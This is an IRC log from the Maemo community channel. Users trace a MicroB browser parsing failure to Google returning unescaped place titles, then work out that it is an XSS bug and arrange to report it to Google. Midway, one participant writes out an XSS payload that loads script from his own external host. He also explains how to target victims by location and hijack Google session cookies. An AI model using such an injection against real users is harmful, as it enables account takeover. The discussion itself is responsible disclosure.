IRC log of #maemo for Saturday, 2015-12-19

*** freemangordon has joined #maemo00:20
*** darkschneider has quit IRC00:23
*** darkschneider has joined #maemo00:23
*** futpib has quit IRC00:37
*** auenfx4 has quit IRC00:37
*** auenfx4 has joined #maemo00:38
*** andril has quit IRC00:41
*** florian has joined #maemo00:46
*** sunshavi has joined #maemo00:56
*** sunshavi has quit IRC01:21
*** florian has quit IRC02:16
*** pozitron has quit IRC02:28
*** animist has joined #maemo02:36
*** ceene has quit IRC02:39
*** ceene has joined #maemo02:39
*** xorly has quit IRC02:48
jonwillooks like I have no solution to my Google problem unless I can find someone who understands the internals of libexpat...02:48
jonwilor convince the largest index of information on the planet to stop returning web pages that fail in an obsolete browser for a device that is now 7 years old02:52
*** drathir has joined #maemo02:53
*** animist has left #maemo02:55
protemis there a sip solution on maemo that supports a socks5 proxy?03:11
ds3just ignore google03:25
ds3they just return garbage anyways03:25
*** drathir has quit IRC03:32
jonwilI would be lost without Google03:38
jonwilThey return very useful result 99% of the time03:38
*** eijk_ has quit IRC03:44
jonwillooks like the hack I found seems to work and Google does good things again. Who knows what else might fail but hey, if I discover things failing I have all the right deb files on my phone to easily install if I need to04:07
*** Humpelstilzchen has joined #maemo04:56
*** eMHa has joined #maemo04:57
*** Defiant has quit IRC04:59
*** eMHa__ has quit IRC05:01
*** jonwil has quit IRC05:31
*** robbiethe1st has joined #maemo05:53
*** jonwil has joined #maemo05:58
*** DocScrutinizer05 has quit IRC06:19
*** DocScrutinizer05 has joined #maemo06:19
*** povbot has joined #maemo06:44
*** sparetire_ has quit IRC06:57
ds3donno what you are searching but they return garbage 99% of the time07:21
ds3just randomly dropping terms to return "results"07:21
*** drathir has joined #maemo07:28
*** drathir has quit IRC08:00
*** RST38h has quit IRC08:15
jonwilThe trick is to know how to use Google properly08:18
jonwiland what the right search terms are08:18
jonwilIts the largest collection of information ever collected, its logical to expect that there are times when it might not return exactly the right result and you need to further narrow it down08:20
*** protem has quit IRC08:23
*** krnlyng has quit IRC08:23
ds3that is a waste of time. they didn't used to do that08:24
*** robbiethe1st has quit IRC08:31
*** drathir has joined #maemo08:36
*** krnlyng has joined #maemo08:37
*** jonwil has quit IRC08:57
KotCzarnyyeah, searching for the right term is the key to the getting good results, but 'good enough search term' is also very good with google, which differentiates is from the most of the other search engines09:01
KotCzarnywhat i dislike with google is that they changed algo somehow and now it returns results with a long delay09:01
KotCzarnyalso, adding 'google fix' extension fixed another delay where they send click to the google first then going to the clicked link target09:03
*** jonwil has joined #maemo09:18
*** Roth has joined #maemo09:18
*** jonwil has quit IRC09:26
*** jonwil has joined #maemo09:35
jonwilhttp://talk.maemo.org/showthread.php?p=1492095#post149209510:02
*** chfoo has quit IRC10:03
jonwilfreemangordon: ping10:03
jonwil~seen pali10:03
jonwildamn bot10:03
jonwil:P10:03
jonwilmerlin1991: ping10:03
KotCzarnyshouldnt it be sent to google.com and not maemo?10:03
KotCzarnypovbot: seen pali10:04
povbotKotCzarny: pali was last seen in #maemo 3 days, 10 hours, 48 minutes, and 57 seconds ago: <Pali> becase we are adding unused link dependences10:04
KotCzarnyuse povbot for seens10:04
jonwilIts google returning invalid output but we would need to A.Find a way to contract the right part of Google (I cant find any such contacts) B.Get them to care about fixing an issue that affects an ancient (in internet terms) no-longer-supported dead browser (unlikely given that they have already dropped support for the relavent Firefox versions that microb-engine comes from) and C.Get them to...10:07
jonwil...then actually make the necessary fix to what output they return (also hard since any change they make to their output has concequences for other browsers too and would need a lot of testing and stuff)10:07
jonwilhence why I am suggesting a workaround in microb might be the only solution10:07
*** heroux has quit IRC10:23
*** florian has joined #maemo10:23
*** florian has quit IRC10:36
*** krnlyng has quit IRC10:38
*** futpib has joined #maemo10:50
*** heroux has joined #maemo10:51
*** krnlyng has joined #maemo10:51
freemangordonjonwil: pong10:52
jonwilFYI, I am going away for xmas (leaving tomorrow afternoon) and wont be on IRC (or doing any dev stuff). I get back about a week later.10:53
KotCzarnypoor you10:53
jonwilit will be fun :)10:54
freemangordonok10:54
jonwillots of cool stuff planned :)10:54
KotCzarny:)10:54
jonwilalso if you have any comments on my microb post, that would be great10:54
jonwilwould be good to see what the best solution is...10:55
*** vectis3 has quit IRC11:02
freemangordonjonwil: I don;t really like the idea to tweak microb outside of the standards just to please google11:11
MaxdamantusI suspect Google would fix it if the relevant people were made aware of it.11:21
jonwilYes I am sure, we just need to find the right people at Google11:21
jonwilwhich seems to be hard11:21
jonwilI cant find any contacts for the Google Search Engine people11:21
Maxdamantushttps://www.google.com/appserve/security-bugs/m2/new?rl=&key=11:23
MaxdamantusI'd call that an XSS bug.11:23
*** Roth has quit IRC11:25
MaxdamantusPossible XSS bug, content passed unescaped into HTML document.11:27
MaxdamantusSimple, correct.11:27
* Maxdamantus would do it himself if he knew the URL involved etc11:27
*** troulouliou_div2 has joined #maemo11:29
MaxdamantusAll you need to do to use it to do actual XSS is create a page somewhere with a title like <script src="//bit.ly/aeaoe"/>11:31
Maxdamantusthen get Google to index it such that you can consistently search for it, then get people to load the URL that produces that document in an iframe.11:31
jonwilI wouldn't call it a security bug11:35
MaxdamantusWhy not?11:36
MaxdamantusXSS is a security bug. It's one of the things listed right there.11:37
Maxdamantus“I want to report a technical security bug in a Google product (SQLi, XSS, etc.).”11:37
Maxdamantusunescaped content in HTML = XSS11:38
MaxdamantusTry searching for something like `script src`11:38
MaxdamantusSee what the produced XML looks like.11:38
MaxdamantusI suspect it'll directly have <script src=""> in it.11:39
Maxdamantusbecause that's in the title of some stackoverflow posts.11:39
jonwilI see no way to exploit this particular issue11:39
MaxdamantusWhat's the URL?11:39
* Maxdamantus will see if he can load microb still.11:39
jonwilFirstly different people will get a different set of results back for the same search based on what Google decides to return for a given search11:39
jonwili.e. what you get back when you search for a given term wont be the same as what I get back11:40
MaxdamantusIt will if it's a fairly unique search.11:40
jonwilthe ones its triggering on for me are fairly common11:40
MaxdamantusTry searching for "maxdamantus temahia"11:40
MaxdamantusI suspect you'll get one result, linking to some log from this chat.11:40
MaxdamantusYou're not trying to do XSS.11:40
MaxdamantusIf you try to do XSS you will try to come up with your own unique searches.11:41
MaxdamantusYou're just stumbling across the bug and it's making your browser fail.11:41
MaxdamantusYou're not the result of a targeted attack. A targeted attack is probably possible with the bug though.11:41
jonwilTo exploit this you would need to find a way to get a web page (with a hand-crafted title of your choice) such that it appears in the "places" section when you search on a Nokia N900 for a specific search term (and does so reliably for many people in many places)11:42
jonwilWhich would be highly unlikely given that Google will only ever show you places local to whatever it thinks your position is11:42
MaxdamantusWhat's the URL?11:43
jonwileven for a unique term11:43
jonwilthere is no URL as such, its searching with microb for specific search terms that happen to trigger the bug11:43
jonwilin my case searching for fish and chips triggers it11:43
MaxdamantusYes, what's a URL?11:43
jonwilbecause the "places" results include the & symbol11:43
MaxdamantusI don't care about the term itself.11:43
MaxdamantusI just want to know the form of URL that has the obvious bug in it.11:44
jonwilThe URL means nothing since the page you get back will be totally different for every browser, location etc.11:44
MaxdamantusThe URL points to a page with a bug in it.11:44
jonwiland in fact there is nothing special about the URL11:44
MaxdamantusWhat is the URL?11:44
MaxdamantusI don't care if it's triggered or not for me.11:45
MaxdamantusI just want to know a URL.11:45
jonwilthere is no special URL, its the normal google search11:45
jonwilany google search via any url will fail on microb if it returns the right results11:46
MaxdamantusSo something like this? https://www.google.co.nz/search?q=foo11:46
jonwilyeah anything will do it11:46
jonwilit has to return results with a "places" section and that section needs to contain a result with an & in the title11:47
jonwilbut like I said unless you can gaurantee that where Google thinks your target is located is in the right place to return your handcrafted "places" result, you cant use this for an exploit. Google wont return a "places" result for a location in New York (for example) to someone in London no matter what search term they use.11:50
MaxdamantusYou can probably just tell them to use the term "fish chips"11:50
MaxdamantusIt happens for me too.11:50
Maxdamantusand I suspect you're in the country next to mine.11:50
jonwilYes I am in Australia :)11:51
jonwilbut it wont happen for everyone and you wont get the ability to control which results it displays11:51
jonwilIf someone searches for fish and chips and they dont get a result with an & in the name, it wont fail11:51
MaxdamantusBut that seems unlikely.11:51
jonwileven if you can be fairly sure it will trigger, its not usable as an exploit since you have no control over the output (at best you can make microb spit out a parser error)11:52
*** Pali has joined #maemo11:53
KotCzarnyjonwil: unlikely != unexploitable11:53
KotCzarnyremember, all bugs are initially hidden because they dont show right away11:54
jonwilI dont deny its a bug11:54
KotCzarnyand 'its unlikely, so it doesnt matter' is a sure way to make your product unsecure11:54
jonwilbut its not an exploit if you the attacker have no way to control what, if any, bogus invalid content the user sees11:54
KotCzarnyjonwil, also, if YOU cant think of a way to exploit it, doesnt mean SOMEONE ELSE cant think of a way11:55
KotCzarnysometimes its a chain of bugs to do an exploit11:55
Maxdamantusjonwil: so it's exploitable in certain areas .. that's exploitable.11:55
KotCzarnythat's why it's important to patch even 'unlikely' bugs11:55
MaxdamantusI'm pretty sure it's not hard to get Google to know about new "places".11:56
Maxdamantusand the class of bug is XSS.11:56
jonwilThe only side effect of the bug is a weird client-side microb parser error, how is that usable for exploiting11:56
Maxdamantuscontent is injected into HTML unescaped.11:56
KotCzarnyurl string can be treated as js variable input?11:56
MaxdamantusThat's the side-effect when a place happens to have an ampersand in it that's not part of an HTML escape sequence.11:57
MaxdamantusThat's the side-effect you're most likely to stumble across when you're not the subject of an attack.11:57
MaxdamantusWhen you're subject to an attack, the side-effect will be the page will be parsed fine, but it'll inject someone else's JavaScript onto a page owned by Google.11:58
Maxdamantuswhich is extremely bad.11:58
Maxdamantusif your browser happens to be logged on to Google, someone else can hijack your session cookies and mess around as you on your Google account.11:59
jonwilThe trick is finding something which, when inserted into the text between a <a> and a </a> tag will cause the browser not to fail on parsing it but will instead do something dangerous12:00
Maxdamantushttps://gist.githubusercontent.com/Maxdamantus/fb3f4252e9b9d21798cd/raw/025026518fde653d44c89f8f724974e361ecc9d9/gistfile1.txt12:02
Maxdamantusie, exactly what I said.12:02
Maxdamantus<script src="//maxdamantus.eu.org/e.js"/>12:02
MaxdamantusThat's perfectly acceptable between <a> and </a> tags12:03
Maxdamantusand if it does appear there, it'll load some weird JS that in this case happens to make all the elements bounce around the screen flashing random colours.12:03
MaxdamantusI'll report it.12:04
jonwilyeah true, we have no way to know if its just the one case of the bogus & sign12:04
jonwilI will report it since I know the details12:04
MaxdamantusI know the details now too.12:04
MaxdamantusIf you do it, you should probably include the first part of that curl command I posted.12:05
Maxdamantussince I can use that to make the request that gets the invalid response from my other machine.12:05
jonwilOk if you know the details, you fill in the report12:05
MaxdamantusOkay.12:05
jonwilespecially since you will probably be in a better position to provide follow up with Google than I will (being that I will be away for a while)12:06
MaxdamantusI'll also be away starting in a few days, but it's okay.12:08
jonwilOh and please keep http://talk.maemo.org/showthread.php?p=1492095#post1492095 up with the details (i.e. your report to Google and anything Google responds with)12:08
jonwilI will probably be in a position to follow t.m.o (via my phone) on my holiday12:10
jonwilI just wont have any access to IRC12:10
jonwilor to anything dev environment etc12:10
jonwiloh and thinking about it, even if its not exploitable, the fact that its "unescaped content being put into a web page" means it can at least be called a security bug and can therefore be submitted to Google via that form and will probably actually reach the inbox of someone with the power to look into it12:12
jonwilbtw Maxdamantus, dont forget to include details of how to reproduce it (an easy way to reproduce it even without needing microb and a N900 is to use a current Gecko based browser, a user-agent switcher and the N900 user agent)12:16
jonwilThat will get it to return the same content as on the N90012:16
MaxdamantusYes. I'm about to figure out a minimal reduction of the user agent required.12:16
jonwilBeing able to reproduce it with a browser that Google developers probably already test against/have locally with just a custom user-agent should make fixing it much easier than if they have to go "what the hell is microb and why should we care"12:17
*** shentey has joined #maemo12:18
Maxdamantusit reports an error in Chrome too (using a UA that triggers the old search page)12:21
Maxdamantuswell, Chromium.12:21
*** Pali has quit IRC12:25
*** darkschneider has quit IRC12:26
*** darkschneider has joined #maemo12:26
*** krnlyng has quit IRC12:27
jonwilthat's good, it shows 100% that its Google returning bogus content to any browser responding with that user agent (and if by some miracle there is a browser being triggered by the same user-agent check that somehow needs the content the way Google is currently sending it, Google will have that info and can find a way to differentiate between that one and the ones that break)12:30
*** shentey has quit IRC12:35
*** shentey has joined #maemo12:37
MaxdamantusIt's probably a problem simply with the old version of the site.12:39
MaxdamantusYou can also use the Nokia N9 UA included in Developer Tools to load it.12:39
jonwilDeveloper Tools as in?12:40
jonwilis that a Chrome feature?12:40
MaxdamantusF12 in Chrome/Chromium12:40
jonwiloh ok12:40
*** krnlyng has joined #maemo12:40
jonwilI dont use Chrome, I use SeaMonkey (Firefox derivative)12:41
jonwilanyhow hopefully Google responds to your report and hopefully they fix the bug12:41
jonwiland I dont need my hack patch to microb anymore :)12:41
Maxdamantusalso, you can specify locations.12:41
Maxdamantushttps://www.google.co.nz/search?near=Wellington&q=cafes12:42
Maxdamantusso if you can get something malicious in a particular region you can target people generally using that bug.12:42
jonwildidn't know that :)12:45
jonwilanyhow lets hope Google will fix this bug in their mobile (or old-browser mobile) site12:45
* Maxdamantus needs to create a business called <script src="//maxdamantus.eu.org/e.js"/> ltd.12:48
*** troulouliou_div2 has quit IRC12:52
sixwheeledbeastUse a different search engine?12:53
Maxdamantus*2015 HOLIDAYS NOTICE*: During the last couple weeks of December, we might take a little bit longer to respond to you. That said, we will be working, and we'll give priority to all high severity reports. Thank you for your understanding.12:53
Maxdamantus(this probably wouldn't be considered high-severity)12:54
jonwilFor now I have a hack fix to libexpat in microb that makes it work enough for searching12:55
jonwilbut its obviously not the right fix12:56
jonwil:)12:56
jonwilhmmm, it might help if I actually printed out the pdf file from the airline with my ticket details on it, going to need that tomorrow :)12:59
*** norayr has quit IRC13:02
jonwilheh, my printer has been saying "out of black ink" for a while now and yet it still prints without fail. I bet its lying to me to get me to throw away perfectly good black ink.13:04
jonwilUnless of course its printing black using the colored ink tank13:04
jonwilok, zzz time, got a lot to do tomorrow :)13:06
jonwilcya13:06
*** jonwil has quit IRC13:06
*** chfoo has joined #maemo13:28
*** pozitrono has joined #maemo13:31
*** eijk_ has joined #maemo13:32
*** shentey_ has joined #maemo13:49
*** shentey has quit IRC13:51
*** krnlyng has quit IRC13:52
*** Vajb has quit IRC13:53
*** Vajb has joined #maemo13:54
*** shentey_ has quit IRC13:55
*** shentey has joined #maemo13:57
*** xorly has joined #maemo13:58
*** krnlyng has joined #maemo14:00
*** shentey has quit IRC14:02
*** shentey has joined #maemo14:08
*** pozitrono has quit IRC14:13
*** eijk_ has quit IRC14:32
*** eijk_ has joined #maemo14:33
*** eijk_ has quit IRC14:39
*** disco_stu_droid has joined #maemo14:40
*** disco_stu has quit IRC14:40
*** disco_stu_droid has quit IRC14:44
*** disco_stu has joined #maemo14:44
*** realitygaps has quit IRC14:46
*** realitygaps has joined #maemo14:47
*** realitygaps has quit IRC14:58
*** realitygaps has joined #maemo15:00
*** realitygaps has joined #maemo15:00
*** krnlyng has quit IRC15:25
*** shentey has quit IRC15:30
*** Sicelo009N has joined #maemo15:55
*** krnlyng has joined #maemo16:00
*** l_bratch has quit IRC16:08
*** xorly has quit IRC16:14
*** vakkov_ is now known as vakkov16:15
*** darkschneider has quit IRC16:27
*** darkschneider has joined #maemo16:27
*** woodong50 has joined #maemo16:33
*** sunshavi has joined #maemo16:58
*** norayr has joined #maemo17:00
*** protem has joined #maemo17:19
*** HRH_H_Crab has quit IRC17:21
*** krnlyng has quit IRC17:29
*** HRH_H_Crab has joined #maemo17:39
*** sunshavi has quit IRC17:39
*** krnlyng has joined #maemo17:42
*** HRH_H_Crab has quit IRC17:46
*** sparetire_ has joined #maemo17:56
*** l_bratch has joined #maemo18:03
*** l_bratch has quit IRC18:04
*** HRH_H_Crab has joined #maemo18:08
*** l_bratch has joined #maemo18:11
*** krnlyng has quit IRC18:28
*** vectis3 has joined #maemo18:36
*** pozitron has joined #maemo18:41
*** krnlyng has joined #maemo18:41
*** xorly has joined #maemo18:50
*** pozitron has quit IRC18:51
sixwheeledbeast~ping18:53
*** vakkov has quit IRC19:12
*** heroux has quit IRC19:14
*** vakkov has joined #maemo19:27
*** heroux has joined #maemo19:31
*** krnlyng has quit IRC19:31
*** Axel_H has joined #maemo19:32
*** Axel_H_ has quit IRC19:32
*** trumee has quit IRC19:32
*** M-bobsummerwill has quit IRC19:32
*** M-bobsummerwill1 has joined #maemo19:32
*** LjL has quit IRC19:33
*** xorly has quit IRC19:33
*** shamus has quit IRC19:34
*** LjL has joined #maemo19:34
*** shamus has joined #maemo19:34
*** norayr has quit IRC19:36
*** norayr has joined #maemo19:42
*** krnlyng has joined #maemo19:45
*** Sicelo009N has quit IRC19:47
*** Sicelo009N has joined #maemo20:05
*** krnlyng has quit IRC20:44
*** krnlyng has joined #maemo21:02
*** vectis3 has quit IRC21:04
*** Kabouik_ has quit IRC21:11
*** Kabouik has joined #maemo21:13
*** vectis3 has joined #maemo21:18
*** peetah has quit IRC21:18
*** Pali has joined #maemo21:18
*** peetah has joined #maemo21:19
*** Kabouik_ has joined #maemo21:24
*** Kabouik has quit IRC21:24
*** Pali has quit IRC21:37
*** Pali has joined #maemo21:38
*** Sicelo009N has quit IRC21:49
*** Sicelo009N has joined #maemo21:54
*** krnlyng has quit IRC21:59
*** Roth has joined #maemo22:06
*** pozitron has joined #maemo22:12
*** krnlyng has joined #maemo22:14
*** jonwil has joined #maemo22:15
jonwilhi22:16
Palijonwil: hi22:17
jonwilNot long now until my holiday. YAY :)22:18
Palijonwil: can you look at http://mg.pov.lt/maemo-ssu-irclog/#maemo-ssu.2015-12-15.log.html#t2015-12-15T23:35:57 ?22:18
jonwilFreemangordon said he was going to do something about that I thnik22:20
jonwilI dont have time to do anything about it, I have to finish getting ready for my holiday :)22:28
*** xorly has joined #maemo22:30
jonwilI will be away for about a week or so :)22:37
Paliok22:39
*** peetah has quit IRC22:50
*** peetah has joined #maemo22:53
jonwilAt least I have a (hack) fix for my problems with Google until such time as Google fixes their stuff :)23:11
freemangordonPali: I will make the appropriate -dev package as long as I have time23:26
Paliok23:26
*** vakkov has quit IRC23:33
*** florian has joined #maemo23:37
*** vakkov has joined #maemo23:37
*** Roth has quit IRC23:50

Generated by irclog2html.py 2.15.1 by Marius Gedminas - find it at mg.pov.lt!